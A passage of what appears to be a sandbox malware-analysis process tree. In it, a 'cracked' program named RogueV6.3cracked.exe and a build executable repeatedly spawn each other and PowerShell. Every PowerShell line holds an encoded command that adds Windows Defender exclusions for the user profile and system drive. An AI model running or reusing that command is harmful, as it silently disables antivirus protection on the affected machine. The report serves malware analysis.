        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        164⤵
        
        PID:6104
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        164⤵
        
        PID:5828
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        164⤵
        
        PID:5712
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        165⤵
        
        PID:5740
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        165⤵
        
        PID:5228
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        165⤵
        
        PID:5460
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        166⤵
        
        PID:5396
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        166⤵
        
        PID:6000
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        166⤵
        
        PID:5340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        167⤵
        
        PID:5372
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        167⤵
        
        PID:4532
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        167⤵
        
        PID:5304
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        168⤵
        
        PID:5200
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        168⤵
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        168⤵
        
        PID:4352
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        169⤵
        
        PID:5868
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        169⤵
        
        PID:5160
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        169⤵
        
        PID:5488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        170⤵
        
        PID:5364
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        170⤵
        
        PID:5992
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        170⤵
        
        PID:5232
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        171⤵
        
        PID:5184
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        171⤵
        
        PID:5188
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        171⤵
        
        PID:5556
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        172⤵
        
        PID:5604
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        172⤵
        
        PID:5276
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        172⤵
        
        PID:5552
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        173⤵
        
        PID:6092
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        173⤵
        
        PID:5432
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        173⤵
        
        PID:5320
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        174⤵
        
        PID:5460
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        174⤵
        
        PID:5984
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        174⤵
        
        PID:6048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        175⤵
        
        PID:5620
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        175⤵
        
        PID:5084
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        175⤵
        
        PID:5304
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        176⤵
        
        PID:5396
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        176⤵
        
        PID:5740
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        176⤵
        
        PID:6112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        177⤵
        
        PID:5936
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        177⤵
        
        PID:4352
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        177⤵
        
        PID:5676
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        178⤵
        
        PID:5924
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        178⤵
        
        PID:5604
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        178⤵
        
        PID:5652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        179⤵
        
        PID:6160
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        179⤵
        
        PID:6200
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        179⤵
        
        PID:6228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        180⤵
        
        PID:6264
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        180⤵
        
        PID:6348
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        180⤵
        
        PID:6392
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        181⤵
        
        PID:6468
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        181⤵
        
        PID:6484
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        181⤵
        
        PID:6492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        182⤵
        
        PID:6536
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        182⤵
        
        PID:6564
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        182⤵
        
        PID:6604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        183⤵
        
        PID:6716
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        183⤵
        
        PID:6728
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        183⤵
        
        PID:6776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        184⤵
        
        PID:6800
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        184⤵
        
        PID:6856
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        184⤵
        
        PID:6884
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        185⤵
        
        PID:6964
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        185⤵
        
        PID:7024
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        185⤵
        
        PID:7032
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        186⤵
        
        PID:7088
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        186⤵
        
        PID:5676
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        186⤵
        
        PID:5556
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        187⤵
        
        PID:5512
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        187⤵
        
        PID:6192
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        187⤵
        
        PID:6300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        188⤵
        
        PID:6108
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        188⤵
        
        PID:6448
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        188⤵
        
        PID:5816
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        189⤵
        
        PID:6064
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        189⤵
        
        PID:6464
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        189⤵
        
        PID:6160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        190⤵
        
        PID:5632
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        190⤵
        
        PID:6672
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        190⤵
        
        PID:6628
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
